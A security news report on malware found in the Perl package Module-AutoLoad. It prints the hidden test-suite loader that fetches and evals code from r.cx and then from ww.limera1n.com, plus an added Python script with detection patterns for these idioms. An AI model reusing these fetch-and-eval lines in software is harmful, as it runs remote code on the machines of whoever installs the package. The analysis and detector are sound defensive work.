Malicious code found in the Perl package Module-AutoLoad

Malicious code has been found in the Perl package Module-AutoLoad, distributed through the CPAN directory and designed to load CPAN modules automatically on the fly. The malicious insert sits in the test file 05_rcx.t, which has shipped with the package since 2011.
Notably, questions about that test loading dubious code were already raised on Stack Overflow back in 2016.

The malicious activity amounts to an attempt to download and execute code from a third-party server (http://r.cx:1/) while running the test suite that is launched when the module is installed. The code originally served by the external server is assumed not to have been malicious, but the request is now redirected to the domain ww.limera1n.com, which serves its own portion of code for execution.

To arrange the download, the file 05_rcx.t uses the following code:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

This code runs the script ../contrib/RCX.pl with the same perl interpreter that is executing the test ($^X), and the script's contents boil down to one line:

use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};

This script fetches code obfuscated with the perlobfuscator.com service from the host r.cx and passes the first line read from the socket to a string eval. The literal 82.46.99.88 is not an IP address: in Perl a bare dotted literal with two or more dots is a v-string, and the character codes 82, 46, 99 and 88 spell "R.cX". Because the block is an argument of "use lib", it runs at compile time, as soon as the file is loaded. Connecting to the host shows what it serves:

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

After uudecoding (unpack "u"), the code that finally executes is the following: it opens a second connection, this time to ww.limera1n.com on port 80, sends a GET request and again evaluates whatever comes back:

print{$b=new IO::Socket::INET"ww.limera1n.com:80"}"GET /iJailBreak
";return do{eval<$b>;warn$@if$@}while$b;1
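The chain above relies on two encodings (a v-string host literal and an unpack("u") payload) and on a handful of loader idioms (a socket opened inline, eval of a line read from a filehandle, a do-block inside "use lib"). The script below is an added example, not code from Module-AutoLoad or from the original article: it decodes both encodings offline and flags the idioms in a source file, so a distribution can be triaged without running its tests or touching the network. The fixtures are constructed here: the RCX.pl line is the one quoted above, but the stage-two payload is a harmless stand-in built in the script, not the real code served by r.cx or ww.limera1n.com.

```python
"""Static triage for the loader chain t/05_rcx.t -> contrib/RCX.pl -> r.cx:1.

Added example, not code from Module-AutoLoad or from the original article.
It decodes Perl v-string host literals and unpack("u") payloads and flags the
loader idioms, without ever connecting anywhere. The fixtures at the bottom
are constructed; the stage-two text is a stand-in, not the real payload.
"""
import binascii
import re

# A bare dotted literal with two or more dots (82.46.99.88) is a Perl v-string:
# each number is a character code, so it can spell a hostname rather than an IP.
VSTRING_RE = re.compile(r'\b(\d{1,3}(?:\.\d{1,3}){2,})\b')
# eval unpack u=>q{...}  /  unpack("u", q{...}): uuencoded lines, no begin/end header
UNPACK_U_RE = re.compile(r'unpack\s*\(?\s*["\']?u["\']?\s*(?:=>|,)\s*q\{([^}]*)\}')

LOADER_PATTERNS = [
    ('socket opened inline', re.compile(r'new\s+IO::Socket::INET\b|IO::Socket::INET->new')),
    ('eval of a line read from a filehandle', re.compile(r'\beval\s*<\s*\$\w+\s*>')),
    ('eval of a uudecoded literal', re.compile(r'\beval\s+unpack\s*\(?\s*["\']?u["\']?\s*(?:=>|,)')),
    ('use lib with a do-block (runs at compile time)', re.compile(r'\buse\s+lib\s+do\s*\{')),
]


def decode_vstring(literal):
    """82.46.99.88 -> 'R.cX': chr() of each dotted number, as perl does for v-strings."""
    return ''.join(chr(int(n)) for n in literal.split('.'))


def uudecode(body):
    """Decode the body of a Perl unpack("u", ...) call, one uuencoded line at a time."""
    out = bytearray()
    for line in body.splitlines():
        if line.strip():
            out += binascii.a2b_uu(line)
    return bytes(out)


def perl_pack_u(data):
    """Mimic Perl's pack("u", $data): 45-byte lines, backtick for zero sextets."""
    return ''.join(binascii.b2a_uu(data[i:i + 45], backtick=True).decode('ascii')
                   for i in range(0, len(data), 45))


def looks_like_hostname(text):
    return bool(text) and text.isascii() and all(c.isalnum() or c in '.-' for c in text)


def triage(source):
    """Return (label, detail) findings for one Perl source file."""
    findings = []
    for label, rx in LOADER_PATTERNS:
        findings.extend((label, m.group(0)) for m in rx.finditer(source))
    for m in VSTRING_RE.finditer(source):
        text = decode_vstring(m.group(1))
        if looks_like_hostname(text):  # 127.0.0.1 decodes to control bytes and is skipped
            findings.append(('v-string spelling a hostname', f'{m.group(1)} -> {text!r}'))
    for m in UNPACK_U_RE.finditer(source):
        findings.append(('uuencoded payload', uudecode(m.group(1)).decode('latin-1')))
    return findings


# Constructed fixtures (see module docstring); STAGE2_PLAINTEXT is a harmless stand-in.
RCX_PL = 'use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};\n'
STAGE2_PLAINTEXT = b'print "constructed stand-in for the downloaded stage\\n";1\n'
STAGE2_LINE = 'eval unpack u=>q{' + perl_pack_u(STAGE2_PLAINTEXT) + '}\n'
BENIGN_T = 'use strict;\nuse Test::More tests => 1;\nok(1, "sanity");\n'

if __name__ == '__main__':
    for name, src in (('contrib/RCX.pl', RCX_PL), ('line served on r.cx:1', STAGE2_LINE),
                      ('t/benign.t', BENIGN_T)):
        for label, detail in triage(src) or [('no loader idioms found', '')]:
            print(f'{name}: {label}: {detail.strip()}')
```

Run over an unpacked distribution's t/ and contrib/ directories, the v-string check is what would have surfaced r.cx in RCX.pl: the address-looking literal decodes to printable text, whereas a genuine loopback or RFC 1918 address decodes to control bytes and is ignored.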

The problematic package has now been removed from the PAUSE (Perl Authors Upload Server) repository, and the module author's account has been blocked. At the same time, the module is still available in the MetaCPAN archive and can be installed directly from MetaCPAN with some tools, such as cpanminus. The package is noted not to be widely distributed.

The exchange with the module's author is worth noting. He denied the suggestion that the malicious code was inserted after his site "r.cx" was hacked, and explained that he was simply having fun, and that he used perlobfuscator.com not to hide anything but to reduce the size of the code and make it easier to copy through the clipboard. The choice of the function name "botstrap" was explained by the fact that the word "looks like bot and is shorter than bootstrap". The module's author also assured that the manipulations found do not perform malicious actions, but merely demonstrate loading and executing code over TCP.

source: budenet.ru
